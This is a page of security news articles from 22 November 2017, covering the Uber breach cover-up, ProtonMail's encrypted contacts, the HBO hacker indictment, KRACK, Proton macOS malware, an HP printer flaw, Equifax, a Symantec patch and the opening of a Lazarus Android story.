English Articles -

Úvod  0  1  2  3  4  5  6  7  8  9  10  11  12  13  14  15  16  17  18  19  20  21  22  23  24  25  26  27  28  29  30  31  32  33  34  35  36  37  38  39  40  41  42  43  44  45  46  47  48  49  50 


After Getting Hacked, Uber Paid Hackers $100,000 to Keep Data Breach Secret
22.11.2017 thehackernews Incindent

Uber is in headlines once again—this time for concealing last year's data breach that exposed personal data of 57 million customers and drivers.
On Tuesday, Uber announced that the company suffered a massive data breach in October 2016 that exposed names, e-mail addresses and phone numbers of 57 million Uber riders and drivers along with driver license numbers of around 600,000 drivers.
However, instead of disclosing the breach, the company paid $100,000 in ransom to the two hackers who had access to the data in exchange for keeping the incident secret and deleting the information, according to a report published by Bloomberg.
Uber said none of its own systems were breached, rather two individuals outside the company inappropriately accessed and downloaded 57 million Uber riders' and drivers' data that was stored on a third-party cloud-based service.
The cyberattack exposed the names and driver license numbers of some 600,000 drivers in the United States, and the names, emails, and mobile phone numbers of around 57 million Uber users worldwide, which included drivers as well.
However, the company said other personal details, such as trip location history, credit card numbers, bank account numbers, Social Security numbers or dates of birth, were not accessed in the attack.
Uber Hid 57 Million User Data Breach For Over a Year
According to Bloomberg report, former Uber CEO Travis Kalanick learned of the cyber attack in November 2016, when the company was negotiating with the Federal Trade Commission (FTC) on a privacy settlement.
So, the company chose to pay the two hackers $100,000 to delete the stolen information and keep quiet about the incident and finally agreed to the FTC settlement three months ago, without admitting any wrongdoing.
Uber Technologies Inc. only told the FTC about the October 2016 data incident on Tuesday, when the breach was made public by Bloomberg.
However, this secret payment eventually cost Uber security executives their jobs for handling the incident.
Now Uber CEO Dara Khosrowshahi has reportedly asked for the resignation of Uber Chief Security Officer Joe Sullivan, and one of his deputies, Craig Clark, who worked to keep the attack quiet.
"None of this should have happened, and I will not make excuses for it. While I cannot erase the past, I can commit on behalf of every Uber employee that we will learn from our mistakes," Khosrowshahi said.
"We are changing the way we do business, putting integrity at the core of every decision we make and working hard to earn the trust of our customers."
Uber is notifying regulatory authorities and offering affected drivers free credit monitoring and identity theft protection.
The company also says that it is monitoring the affected accounts for fraudulent activity and that riders do not need to take any action against this incident. It's likely that Uber will be forcing its customers to reset their passwords for its app.

ProtonMail Launches Encrypted Contacts Manager
22.11.2017 securityweek  Safety
Swiss-based encrypted email services provider ProtonMail announced on Tuesday the launch of a new tool designed to help users securely manage their contacts.

According to the vendor, the new ProtonMail contacts manager has been in development for more than a year and it adds powerful functionality for managing the address book.

What makes ProtonMail Contacts highly secure is the fact that it uses zero-access encryption. This means contact information is encrypted and it can only be decrypted by the user – not even ProtonMail can access the data.

The company says the new encrypted contacts manager is ideal for journalists and other individuals for whom it’s critical that contact information is protected.

ProtonMail noted that the new feature secures phone numbers, physical addresses and other information added by the user, but it does not use zero-access encryption for email addresses as it would break email filtering functionality and it wouldn’t represent a significant privacy improvement considering that the service needs to know the recipient’s email address in order to deliver messages.

ProtonMail Contacts

On the other hand, the new ProtonMail Contacts tool does provide some protection for email addresses by using digital signatures to verify their integrity. The digital signatures mechanism, which provides a cryptographic guarantee that contact data hasn’t been tampered with, covers all the information stored in the address book, not only email addresses. If the application detects an invalid signature, it displays an error message to alert the user.

“This is a big security benefit for many reasons,” ProtonMail said in a blog post. “For example, if an attacker wanted to intercept the communications between you and a sensitive contact, one way to do it could be to secretly change the email address or phone number you have saved for that contact, such as changing john.smith(at)protonmail.com to john.snnith(at)protonmail.com, which might escape your notice.”

The new contacts manager relies on new private and public key pairs for each account. The private key is generated based on the user’s password and it’s stored on the client side, preventing ProtonMail from gaining access to the encryption key. The same key pair is used both for encrypting contact information and digital signing.

The new contacts manager is currently only available for the web version of ProtonMail, but it will soon be added to the iOS and Android apps as well. Future versions of the tool will also allow users to store keys created for sending PGP-encrypted messages, ProtonMail said.

The source code for ProtonMail’s web client, including the contacts manager, is available on GitHub.

ProtonMail Contacts – ProtonMail launches world’s first encrypted contacts manager
22.11.2017 securityaffairs Safety

ProtonMail launched ProtonMail Contacts, the world’s first contact manager with both zero-access encryption and digital signature verification.
ProtonMail is announcing today the launch of the world’s first encrypted contacts manager that also features digital signature verification. Starting immediately, the new contacts manager is available to all of ProtonMail’s 5 million users around the world.
The development and launch of this feature was driven by the feedback that the company received from many of its users in the investigative journalism space. “Last year, we had the unique opportunity to meet with many of our users in the field at the Second Asian Investigative Journalism Conference in Kathmandu, Nepal, and one message that we heard over and over again was the need for better ways to protect sources,” says ProtonMail co-founder Dr. Andy Yen, “the new encrypted contacts manager today is the result of over one year of research and development into how we can best meet the needs of the thousands of activists, journalists, and dissidents who rely on ProtonMail to protect their privacy.“
In addition to protecting sensitive contact details with zero-access encryption (meaning that ProtonMail itself cannot decrypt the data, and cannot reveal the private contact details to third parties), ProtonMail’s new contact manager also utilizes digital signatures to verify the integrity of contacts data. This provides a cryptographic guarantee that nobody (not even ProtonMail), has tampered with the contacts data.
“Combining encryption with digital signatures provides powerful protection that guarantees not only the privacy, but also the authenticity of the contacts saved in ProtonMail, and reduces the need to trust ProtonMail, as even we cannot access or change this information without your knowledge,” says Dr. Yen. In line with standard company practice, the software behind ProtonMail’s encrypted contacts manager is fully open source.
ProtonMail Contacts
-> For more details about ProtonMail’s encrypted contacts manager, please refer to our launch blog post here: https://protonmail.com/blog/encrypted-contacts-manager/
-> The link to this press release can be found here: https://protonmail.com/blog/contacts-press-release/
-> ProtonMail’s media kit can be found here: https://protonmail.com/media-kit/

U.S. charges Iranian state-sponsored hacker over ‘Game of Thrones’ HBO hack
22.11.2017 securityaffairs BigBrothers

US Department of Justice charged the Iranian computer expert Behzad Mesri of ‘Games of Thrones’ HBO Hack, he also worked with the Iranian Military.
The United States charged the Iranian computer expert Behzad Mesri of ‘Games of Thrones‘ HBO Hack. On Tuesday, the man was charged with stealing scripts and plot summaries for ‘Games of Thrones’.

The Manhattan US attorney Joon Kim said Mesri is “had previously hacked computer systems for the Iranian military”. The man threatened to release stolen data, unless HBO paid a $6 million ransom in Bitcoin.

“Behzad Mesri, an Iranian national who had previously hacked computer systems for the Iranian military, allegedly infiltrated HBO’s systems, stole proprietary data, including scripts and plot summaries for unaired episodes of Game of Thrones, and then sought to extort HBO of $6 million in Bitcoins.” said U.S. Attorney Joon H. Kim. “Mesri now stands charged with federal crimes, and although not arrested today, he will forever have to look over his shoulder until he is made to face justice. American ingenuity and creativity is to be cultivated and celebrated — not hacked, stolen, and held for ransom. For hackers who test our resolve in protecting our intellectual property — even those hiding behind keyboards in countries far away — eventually, winter will come.”

Behzad Mesri, who is still at large, is an Iran-based hacker who also goes online with the moniker Skote Vahshat.

Mesri faces seven counts in the United States, including wire fraud, aggravated identity theft and four counts of computer fraud.


The DoJ accused the man of being the mastermind behind the cyber attacks against HBO from May to August, he stole scripts and plot summaries for then unaired episodes of the “Game of Thrones” series, and multiple other shows.

Mersi compromised multiple user accounts belonging to HBO employees and other authorized users, in this way he accessed the company servers and stole confidential and proprietary information.

“Over the course of several months, MESRI used that unauthorized access to steal confidential and proprietary information belonging to HBO, which he then exfiltrated to servers under his control.” states the press release published by the US Department of Justice.

“Through the course of the intrusions into HBO’s systems, MESRI was responsible for stealing confidential and proprietary data belonging to HBO, including, but not limited to: (a) confidential video files containing unaired episodes of original HBO television programs, including episodes of “Barry,” “Ballers,” “Curb Your Enthusiasm,” “Room 104,” and “The Deuce;” (b) scripts and plot summaries for unaired programming, including but not limited to episodes of “Game of Thrones;”(c) confidential cast and crew contact lists; (d) emails belonging to at least one HBO employee; (e) financial documents; and (f) online credentials for HBO social media accounts (collectively, the “Stolen Data”).”

According to the US prosecutors, Mesri previously conducted computer attacks on behalf of the Iranian military that targeted nuclear software systems and Israeli infrastructure.

Prosecutors confirmed that the Iranian man was a member of the Iranian-based Turk Black Hat Security hacking group that targeted hundreds of websites in the United States and around the world.

“MESRI is an Iran-based computer hacker who had previously worked on behalf of the Iranian military to conduct computer network attacks that targeted military systems, nuclear software systems, and Israeli infrastructure.” continues the DoJ.

“At certain times, MESRI has been a member of an Iran-based hacking group called the Turk Black Hat security team and, as a member of that group, conducted hundreds of website defacements using the online hacker pseudonym “Skote Vahshat” against websites in the United States and elsewhere.”

More Industrial Products at Risk of KRACK Attacks
22.11.2017 securityweek 
An increasing number of vendors have warned customers over the past weeks that their industrial networking products are vulnerable to the recently disclosed Wi-Fi attack method known as KRACK.

The KRACK (Key Reinstallation Attack) flaws affect the WPA and WPA2 protocols and they allow a hacker within range of the targeted device to launch a man-in-the-middle (MitM) attack and decrypt or inject data. A total of ten CVE identifiers have been assigned to these security bugs.

The vulnerabilities impact many products, including devices designed for use in industrial environments. The first industrial solutions providers to warn customers about the KRACK attack were Cisco, Rockwell Automation and Sierra Wireless.

Cisco said the flaws affect some industrial routers and access points, for which the company has released updates. Rockwell and Sierra Wireless have also identified impacted products and provided patches and mitigations.KRACK affects industrial products

Other industrial solutions providers have come forward in the past weeks to admit that their products are affected.

Siemens said the KRACK vulnerabilities affect some of its SCALANCE, SIMATIC, RUGGEDCOM, and SINAMICS products. The company is working on releasing updates that will address the security holes and, in the meantime, it has provided some mitigations.

Swiss-based ABB informed customers that TropOS broadband mesh routers and bridges running Mesh OS 8.5.2 or prior are also vulnerable to KRACK attacks. ABB has yet to release patches, but it did provide workarounds and mitigations.

German industrial automation firm Phoenix Contact also confirmed that three of the KRACK flaws affect some of its BL2, FL, ITC, RAD, TPC and VMT products. The company said the impact is limited for some of its products, and pointed out that in many cases the attacker would have to be inside the plant in order to conduct an attack.

KRACK affects industrial products

Phoenix is working on patching the vulnerabilities in affected products. The vendor has advised customers using devices running Windows to install the security updates provided by Microsoft.

Lantronix informed customers that several of its wireless connectivity solutions are impacted by KRACK, including PremierWave ethernet-to-WiFi gateways, WiPort wireless ethernet bridges, MatchPort programmable embedded device servers, xPico embedded IoT WiFi modules, SGX IoT device gateways, and WiBox wireless device servers.

The company has released a patch for PremierWave 2050. For the other products, fixes are expected to become available by the end of the year.

Some Johnson Controls products may also be vulnerable to KRACK attacks. The company’s product security and incident response team (PSIRT) is currently assessing the impact of these flaws.

Kaspersky Lab’s ICS-CERT team pointed out that while KRACK attacks can be launched against industrial control systems (ICS) -- for example, some PLCs use Wi-Fi for remote management -- the biggest risk is to network communication devices, smartphones and tablets used by engineers and operators for remote access to ICS.

“In most cases KRACK attacks present virtually no risk to those large industrial and critical infrastructure systems that do not use 802.11 technologies. Today, such systems constitute an absolute majority,” explained Ekaterina Rudina, senior system analyst in Kaspersky’s ICS-CERT team. “Even in cases where these technologies may be used, physical restrictions on access to the controlled zone (e.g., a specific manufacturing unit) would prevent an attack from being carried out.”

“The main risk zone still encompasses those industrial sectors the security of which is given a lower priority than that of critical infrastructure systems and where using wireless technologies to upgrade systems or meet industrial network maintenance needs has become necessary but where compliance with the ‘best practices’ supported by major vendors is not possible because the changes required are too complicated or too costly,” Rudina added.

Unbelievable: Uber concealed data breach that exposed 57 Million records in 2016
22.11.2017 securityaffairs Incindent

Unbelievable: Uber concealed data breach that exposed 57 Million records in 2016 and paid hackers to delete stolen records.
Uber CEO Dara Khosrowshahi announced on Tuesday that hackers broke into the company database and accessed the personal data of 57 million of its users, the bad news is that the company covered up the hack for more than a year.

The attackers accessed also the names and driver’s license numbers of roughly 600,000 of its drivers in the United States.

The hack happened in 2016, it was easy for hackers that according to a report published by Bloomberg, obtained credentials from a private GitHub site used by the Uber development team. The hackers tried to blackmail Uber and demanded $100,000 from the company in exchange for avoiding publish the stolen data.

“Two attackers accessed a private GitHub coding site used by Uber software engineers and then used login credentials they obtained there to access data stored on an Amazon Web Services account that handled computing tasks for the company. From there, the hackers discovered an archive of rider and driver information. Later, they emailed Uber asking for money, according to the company.” states Bloomberg.

In a statement on Tuesday, Khosrowshahi said the intruders accessed cloud-hosted data stores:

“I recently learned that in late 2016 we became aware that two individuals outside the company had inappropriately accessed user data stored on a third-party cloud-based service that we use. The incident did not breach our corporate systems or infrastructure.

At the time of the incident, we took immediate steps to secure the data and shut down further unauthorized access by the individuals. We subsequently identified the individuals and obtained assurances that the downloaded data had been destroyed. We also implemented security measures to restrict access to and strengthen controls on our cloud-based storage accounts.” reads a CEO’s statement.

“You may be asking why we are just talking about this now, a year later. I had the same question, so I immediately asked for a thorough investigation of what happened and how we handled it.”

uber data breach

The situation is more unbelievable, rather than to notify the data breach to customers and law enforcement as is required by the California’s data security breach notification law, the Uber’s chief of information security Joe Sullivan ordered to pay the ransom and to cover the story destroying any evidence. The payout was disguised as a bug bounty prize complete with non-disclosure agreements signed. It is a good way to hide the payment, Uber is running a bug bounty program to encourage white hat hackers to responsibly disclose vulnerabilities affecting its services.

“Uber acquiesced to the demands, and then went further. The company tracked down the hackers and pushed them to sign nondisclosure agreements, according to the people familiar with the matter. To further conceal the damage, Uber executives also made it appear as if the payout had been part of a “bug bounty” — a common practice among technology companies in which they pay hackers to attack their software to test for soft spots.” reported The New York Times“

“The details of the attack remained hidden until Tuesday. The ride-hailing company said it had discovered the breach as part of a board investigation into Uber’s business practices.”

As a result of the new board investigation Sullivan and one of his lieutenants were ousted.

The CEO explained that such kind of thing will not happen again in the future because Uber put the customers’ security and trust as the pillar of its business.

“While I can’t erase the past, I can commit on behalf of every Uber employee that we will learn from our mistakes. We are changing the way we do business, putting integrity at the core of every decision we make and working hard to earn the trust of our customers.” added Khosrowshahi.

The CEO added that forensics experts haven’t found evidence that data were downloaded, anyway the company is monitoring the affected account for fraudulent activities.

Below the list of actions the company has taken in response to the incident:

I’ve asked Matt Olsen, a co-founder of a cybersecurity consulting firm and former general counsel of the National Security Agency and director of the National Counterterrorism Center, to help me think through how best to guide and structure our security teams and processes going forward. Effective today, two of the individuals who led the response to this incident are no longer with the company.
We are individually notifying the drivers whose driver’s license numbers were downloaded.
We are providing these drivers with free credit monitoring and identity theft protection.
We are notifying regulatory authorities.
While we have not seen evidence of fraud or misuse tied to the incident, we are monitoring the affected accounts and have flagged them for additional fraud protection.
The New York Attorney General Eric Schneiderman has also launched an investigation into Uber data breach.

This isn’t the first time the company has experienced security breaches, it suffered the first data breach in May 2014, but the event was discovered on February 2015.

In the attack, the names and driver’s licenses of more than 50,000 of the company’s drivers were compromised.

At the time, the giant announced a data breach that resulted in unauthorized access to the driver partner license numbers of roughly 50,000 of its drivers.

In June 2016, security experts from the Integrity firm have found more than a dozen flaws in the Uber website that could be exploited by hackers to access driver and passenger data. The researchers discovered a total of security 14 issues, four of which cannot be disclosed.

Uber Hacked: Information of 57 Million Users Accessed in Covered-Up Breach
22.11.2017 securityweek  CyberCrime
Uber Discloses Massive Hack

Uber Covered Up Massive Hack in 2016 for More Than a Year

Uber said Tuesday that hackers accessed the personal data of 57 million of its users in a breach that had been covered up by the company for more than a year.

Stolen information included the names, email addresses and mobile phone numbers of customers around the world, while the names and driver’s license numbers of roughly 600,000 of its drivers in the United States were accessed.

“I recently learned that in late 2016 we became aware that two individuals outside the company had inappropriately accessed user data stored on a third-party cloud-based service that we use,” Uber CEO Dara Khosrowshahi, wrote in a blog post Tuesday, adding that the incident did not breach Uber’s corporate systems or infrastructure.

According to a report from Bloomberg, attackers obtained credentials from a private GitHub site used by Uber’s software developers, which were used to access data stored on an Amazon Web Services (AWS) account.

Uber reportedly paid $100,000 to the hackers as a ransom payment in order to limit fallout from the breach. The company did not provide any details on such payment, but said “we subsequently identified the individuals and obtained assurances that the downloaded data had been destroyed.”

Uber said that two employees “who led the response to the incident" are no longer with the company. While the company did not provide names, some reports indicate that Chief Security Officer Joe Sullivan has been let go. Uber hired Sullivan, Facebook's former security chief, as its first ever Chief Security Officer in April 2015.

SecurityWeek has contacted Uber for comment on the ransom payment and Sullivan’s rumored departure.

“Today’s incident at Uber is an example of how unprotected machine identities can lead to data breaches. Access to cloud services, such as like Amazon AWS, are secured with SSH keys that are often outside the control of security teams,” Kevin Bocek, chief security strategist for Venafi, told SecurityWeek. “Unfortunately, we frequently seen SSH keys that provide access to AWS left unprotected in GitHub. Without robust SSH intelligence and strong security controls malicious actors can abuse these keys while flying under the radar of most other security controls,” Bocek added.

“The Uber breach is staggering not so much in its magnitude, but more so in the extensive efforts the company seems to have made in concealing the breach in violation of their customers’ trust and perhaps laws that require disclosure,” John Gunn, Chief Marketing Officer at Vasco Data Security, told SecurityWeek.

Uber does run a bug bounty program to encourage security researchers to responsibly disclose vulnerabilities found in across its services.

In June 2016, Researchers from Portugal-based security consulting and audit firm Integrity identified more than a dozen vulnerabilities in Uber websites and services, including issues that could have been exploited to access driver and passenger information.

In 2015, Uber disclosed two security incidents: one where an unauthorized party gained access to the driver’s license numbers of roughly 50,000 drivers, and a software bug that exposed the personal details of hundreds of U.S. drivers.

Has Everyone Really Been Hacked?
22.11.2017 securityweek  Hacking
There is little doubt that fear sells security products, hikes law enforcements agency (LEA) budgets and sells newspapers. Both the security industry and government agencies benefit from sensational headlines; leaving people wondering what the real truth may be. So when UK newspaper The Times ran a headline, 'Everyone has been hacked, say police', it leaves the question, is this just more scaremongering or a true reflection on the state of security?

To my knowledge and belief, I have not been hacked (yet) -- so the headline is patently untrue. But I (and indeed everyone) am frequently targeted; I'm fairly certain I have dozens of unclicked malicious links and files in my mail system. Here's the first method of scaremongering: security vendors, LEAs and parts of the media will often claim, 'millions of users hit by new malware'. The truth is most likely that millions of users have been targeted or can potentially be affected, not that millions of users have been infected.

The Times headline is very clear: everyone has been hacked. But this is not what the police actually said. According to The Times' own report, "Virtually everyone in the country is likely to have had their personal data hacked and placed for sale on the dark web, police have said."

This is bad enough, but it is not the same as being personally hacked. What the police (in this case Peter Goodman, the National Police Chiefs' Council lead for cybercrime and the Chief Constable for Derbyshire) is saying is that everybody will have had some personal data taken by cybercriminals via third party breaches (such as Yahoo, LinkedIn, TalkTalk and more recently Equifax). Whether the amount of personal data stolen in this way is more or less than the personal data we willingly give to Google, Microsoft and Facebook is a separate -- but equally valid -- question.

Nor do we know what personal data has been stolen -- some personal data is clearly more valuable to cybercriminals (and dangerous to us) than other personal data. However, we should never dismiss any data loss as being unimportant. Cybercriminals, and especially state-affiliated criminals, have as much ability to use big data correlation and analysis as the big security vendors and government agencies. Little bits of data from different sources can be matched together to form a surprisingly detailed picture of us.

The question then remains, how accurate is the police view that we have all been affected by third-party data loss?

Chris Morales, head of security analytics at Vectra, comments, "Anyone who has performed any online transaction has personal data on the internet. Even worse, personal information exists in locations people are not even aware of or have any control over.

Equifax impacted more than 145 million consumers. Of those, around 700,000 were believed to be in the UK. That is just one recent breach.

Based on data reported from breachlevelindex.com [a site sponsored by Gemalto], there have been 9,198,580,293 data records lost or stolen since 2013. That's more data records than people in the world. For the UK specifically, they report a number of 137,516,163 records stolen since 2013, double the population. Therefore, it is a reasonable assumption to make that everyone has been hacked and some more than once." (Notice that Morales accepts the Times' use of the term 'hacked'.)

Chris Roberts, chief security architect at Acalvio, takes a similar stance. "Healthcare has lost between 600 and 700 million records since we started counting," he told SecurityWeek. "That's almost twice the population of the United States. Between all the various high visibility breaches and government losses, it's arguable that everyone's data is already out there. Finally, the quantity of credit cards that are breached on an annual basis would arguably demonstrate that almost everyone has had financial breaches."

Ilia Kolochenko, disagrees with the headline, but agrees with the content. "Digitization has become an inalienable part of our everyday lives," he told SecurityWeek. "Even people who have never used a PC or a smartphone have their personal data stored and processed somewhere. Cybercrime is skyrocketing, and the vast majority of digital systems have been breached. However, I think that it's technically incorrect to say that every person was hacked, as our common notion of "hack" implies at least some motive and targeting. Otherwise, we can reasonable say that every person in the world has been hacked many times over."

He has concerns over the headline, but has no issue with the content. "In the matter of general awareness, such announcements are beneficial, as many people still seriously underestimate the growing hydra of cybercrime. Hopefully, the government will finally allocate additional resources that are necessary to fight cybercrime on national and international levels. Right now, law enforcement is seriously under-equipped with technology, qualified personnel and financial resources to prevent, investigate and prosecute digital crime."

The general consensus is that (apart from the headline), the views of Peter Goodman do not represent scaremongering. Stephen Burke, founder and CEO of Cyber Risk Aware adds a rider: "There is a high percentage of people that have been affected by cybercrime -- however, it would be unfair to say that everyone has been a victim. It's possible they could be by virtue of the data that is readily available online and the data that they give out via social media and to companies who handle billing. If this were the case, then there would be too much data for hackers to handle."

Nevertheless, statistics suggest that everyone, from corporate manager to stay-at-home mum and her kids, have had personal data stolen by cybercriminals. Goodman has his own solution: "Mr Goodman said that providing lifetime security for digital devices should be mandatory," says the Times.

That's a big, and frankly unrealistic ask. "We have learned prevention is never going to be enough and at some point it is realistic to assume a breach will occur," said Morales. "At that point, we must be better prepared to detect and respond to the breaches that do happen and that can cause the most damage. The goal should be to reduce the impact of those breaches."

The implication is clear. Just as business is exhorted to plan its response to an inevitable breach, individuals need to plan a response to the seemingly inevitable misuse of their stolen personal data.

macOS Malware Spread Via Fake Symantec Blog
22.11.2017 securityweek  Apple
A newly observed variant of the macOS-targeting Proton malware is spreading through a blog spoofing that of legitimate security company Symantec.

The actor behind this threat created symantecblog[dot]com, a good imitation of the real Symantec blog, and even mirrored content from the original. On this blog, a post about a new version of CoinThief, a piece of malware from 2014, promotes an application called “Symantec Malware Detector,” while in fact distributing OSX.Proton instead.

The domain’s registration information appears to be legitimate, with the same name and address as those used by Symantec, but the email address shows that something is off. Furthermore, the certificate used for the site is a legitimate SSL certificate issued by Comodo and not by Symantec’s own certificate authority.

Links to the fake blog have been spreading on Twitter via both fake and legitimate accounts, Malwarebytes reports. It is possible that the actor behind this campaign used stolen passwords to access legitimate accounts and promote their malicious post. However, it is also possible that people were tricked into promoting the link.

When first run, the Symantec Malware Detector application displays a very simple window, using the Symantec logo, claiming to require authorization to perform a system check. Should the potential victim close the window at this point, the malware won’t be installed, the researchers say.

Should the user agree to run the check, the admin password is requested, a step that results in the malware stealing the password. Next, the app displays a progress bar claiming to be scanning the computer, but Proton is installed in the background.

The Symantec Malware Detector application is nothing more than a malware dropper, and all users who have downloaded it are advised to delete it and attempt to disinfect their systems.

The malware immediately starts gathering user information, such as the admin password and other personally-identifying information (PII), and saves all data to a hidden file. Keychain files, browser auto-fill data, 1Password vaults, and GPG passwords are also harvested.

The Proton executable is dropped in the .random directory and is kept running by the com.apple.xpcd.plist launch agent. The stolen data is stored in the .cachedir folder.

“Fortunately, Apple is aware of this malware and has revoked the certificate used to sign the malware. This will prevent future infections by the Symantec Malware Detector. Revoking the certificate will not, by itself, do anything to protect a machine that is already infected,” the security researchers explain.

Proton has been designed to steal login credentials and affected users are advised to take emergency actions post-infection. They should consider all of their online passwords as compromised and change all of them, while also setting up a different password for each site and storing all of them in a password manager. The master password should not be stored in the keychain or anywhere else on the computer. Enabling two-factor authentication should also minimize the impact.

This incident, the researchers note, shows the danger of fake news being used to spread malware. Due to the increased prevalence of adware for macOS, many users are looking to download malware removal tools, and cybercriminals are attempting to take advantage of that.

“Proton has been circulating for quite some time after its initial appearance in March. It has previously been distributed via a compromise of the Handbrake application and a similar compromise of a couple Eltima Software applications. It is highly likely that Proton will continue to circulate, and similar incidents will continue to occur,” Malwarebytes concludes.

Code Execution Flaw Found in HP Enterprise Printers
22.11.2017 securityweek 
Researchers have found a potentially serious remote code execution vulnerability in some of HP’s enterprise printers. The vendor claims to have already developed a patch that will be made available to customers sometime this week.

Back in 2015, HP announced the launch of new enterprise-grade LaserJet printers fitted with security features designed to block malicious actors from breaching a company’s network. Roughly one year later, the company also announced several security improvements to its Managed Print Services.

The tech giant claims it provides “the world’s most secure printing” and a recent marketing campaign run by the company shows how printers from other vendors can allow hackers to cause significant damage to an organization.

HP Printer

Researchers at FoxGlove Security wanted to put HP’s claims to the test so they acquired an HP PageWide Enterprise 586dn multi-functional printer (MFP), currently sold for $2,000, and an HP LaserJet Enterprise M553n printer, which costs roughly $500.HP Printer

The experts started testing the devices using PRET (PRinter Exploitation Toolkit), a tool developed by researchers from Ruhr-Universität Bochum in Germany. When PRET was introduced, its creators claimed to have used it to find vulnerabilities in 20 printers and MFPs from HP, Brother, Lexmark, Dell, Samsung, Konica, OKI and Kyocer.

FoxGlove used PRET to find a path traversal flaw that allowed them to access the content of any print job, including PIN-protected jobs. PRET also helped it discover vulnerabilities that can be exploited to manipulate the content of print jobs, and reset devices to factory settings and implicitly remove the admin password.

However, the researchers’ goal was to find a vulnerability that could be exploited for remote code execution (RCE). In order to achieve this, they extracted the printer operating system and firmware and reverse engineered them. HP has implemented some mechanisms to prevent tampering with the system, but the experts managed to bypass them and gain access to files.

They then analyzed firmware updates and HP Software Solutions, which use the OXP platform and SDK to extend a printer’s functionality. Both Solutions and firmware updates are delivered as a single bundle (.BDL) file that needs to have a valid signature.

They failed to upload a malicious firmware to the device due to the signature validation mechanism, but they have proposed some possible attack vectors in case others want to continue the research. On the other hand, they did crack signature validation for Solutions files and they managed to upload a malicious DLL and execute arbitrary code.

FoxGlove Security has made available the source code of the tools used during the research, including proof-of-concept (PoC) malware.

The code execution vulnerability was reported to HP on August 21 and the company has promised to release a patch this week.

House Committees Get Serious in New Letter to Equifax
22.11.2017 securityweek  Crime
The chairpersons of the House Science, Space, and Technology Committee and the House Oversight and Government Reform Committee on Monday sent a new letter (PDF) to Paulino Barros, the interim CEO of Equifax.

The former committee's jurisdiction includes the standards of use for securing personally identifiable information (PII), while the latter committee's jurisdiction covers how data breaches impact the federal workforce and national security. Both are investigating the loss of PII on 145 million Americans announced by Equifax on September 7, 2017.

This is not the first letter to Equifax by chairpersons Lamar Smith (R-Texas) and Trey Gowdy (R-S.C.). They also wrote (PDF) on September 14, 2017 requesting 'all documents' relevant to five specific areas; such as "to and from members of Equifax's corporate leadership", and "relating to the NIST Framework or other cybersecurity standards used by Equifax." That first letter specified no later than September 28, 2017.

It would seem that Equifax has not yet, or at least not yet satisfactorily, fulfilled this first request almost eight weeks after the deadline. "We look forward to Equifax providing all documents in response to the five categories of requested materials in the September 14 request, as well as the requests that were made at subsequent Committee briefings." It adds that the Committees expect to make additional requests in the future.

In the meantime, however, it is clear the committees are beginning to get to grips with the details of both Equifax and the breach. While the first letter requested 'areas' of documents, the second letter is far more specific. For example, it asks for documentation that would allow the identification "of any and all individuals in an executive leadership role", and those who received the DHS email alert "regarding Apache Struts 2".

It then asks for organizational charts and documents able to identify staff under the CIO during a specific period, together with breach communications with any federal agency generally, and the DHS specifically. It seeks similar charts and documents to identify staff under the CSO during the breach period, and specifically, "Any communications between former CSO Susan Mauldin and any individuals that relate to Apache Struts 2 that were made from March 8, 2017 to September 30, 2017."

Further requests make it clear that the Committees aren't looking for how the breach occurred (it was the failure to patch the Struts 2 vulnerability), but to find out exactly what happened and who was responsible for each step of the Equifax response.

For example, on July 29, 2017, Equifax was aware that hackers had been accessing the PII of as many as 143 million American consumers (later amended to more than 145 million) over the prior two months. In a press statement also released Monday, the Science, Space, and Technology committee says, "Equifax reportedly first learned on July 29, 2017, hackers had... On September 7, 2017 - nearly six weeks later - Equifax notified the public of the breach."

The delay is clearly a concern -- and this is born out in the latest letter to Equifax. The committees have now specifically asked for, "The name and title of the individual who contacted the Federal Bureau of Investigation (FBI) on August 2, 2017", and "The names and titles of all individuals who were party to the conversation with the FBI during which the FBI told Equifax to refrain from discussing attribution".

It is noticeable that the letter does not indicate that the FBI said the breach should not be disclosed, only that attribution should not be discussed. On the basis of this letter and its requests, it would be a reasonable assumption that the House is concerned about the delay in public disclosure, and is determined to find out how and by whom it was delayed.

It is also worth noting that in one respect at least, Equifax has been very lucky. If this breach had happened in 2018 rather than 2017, it would have been within the remit of the EU's General Data Protection Regulation (GDPR). Equifax would have been in breach of GDPR in at least two major ways. Firstly, it had no legal right to hold the European PII that was stolen (it is currently thought that more than 690,000 UK consumers had PII taken); Equifax apparently forgot about the records. And secondly, because of the nature of the data stolen, Equifax would have been required to notify the affected people within 72 hours (not the nearly six weeks it actually took).

Add to this the slack attitude to patching the vulnerable Apache Struts 2 vulnerability, and it is likely that any European GDPR regulator would feel obliged to levy a sizable proportion of its maximum fine of up to 4% of Equifax's annual turnover.

Symantec Patches Vulnerability in Management Console
22.11.2017 securityweek 
Symantec has released an update to address a directory traversal vulnerability in the Symantec Management Console.

Tracked as CVE-2017-15527, the security flaw has a CVSS score of 7.6 and has been assessed with a High severity rating, Symantec explains in an advisory published on Monday. The issue has been addressed in Symantec Management Console version ITMS 8.1 RU4 and all previous versions of the product are deemed vulnerable.

The directory traversal exploit is a type of attack that occurs when user-supplied input file names aren’t properly validated or sanitized from a security perspective. Thus, characters representing “traverse to parent directory” are allowed to pass through to the file APIs.

By utilizing such attacks, a malicious actor can leverage the affected application to gain unauthorized access to the file system, Symantec explains in its advisory.

According to Symantec, the issue was validated by the product team engineers and an update to the Symantec Management Console was released to address it.

“Note that the latest Symantec Management Console release and patches are available to customers through normal support channels. At this time, Symantec is not aware of any exploitations or adverse customer impact from this issue,” the company says.

To reduce risk of attack, Symantec recommends restricting access to administrative or management systems to authorized privileged users; restricting remote access to trusted/authorized systems only; and using the principle of least privilege, where possible.

All systems and applications should be kept updated, a multi-layered approach to security should be adopted, and network and host-based intrusion detection systems should be deployed to monitor network traffic for suspicious activity, the company notes.

The German Federal Office for Information Security (Bundesamt für Sicherheit in der Informationstechnik, abbreviated as BSI) too has issued an alert (in German) on the Symantec Management Console directory traversal vulnerability, noting that the issue can be exploited remotely from a local network.

Lazarus APT uses an Android app to target Samsung users in the South Korea
22.11.2017 securityaffairs APT

The North Korea linked group Lazarus APT has been using a new strain of Android malware to target smartphone users in South Korea.
The hacking campaign was spotted by McAfee and Palo Alto Networks, both security firms attributed the attacks to the Hidden Cobra APT.

The activity of the Lazarus APT Group surged in 2014 and 2015, its members used mostly custom-tailored malware in their attacks and experts that investigated on the crew consider it highly sophisticated.

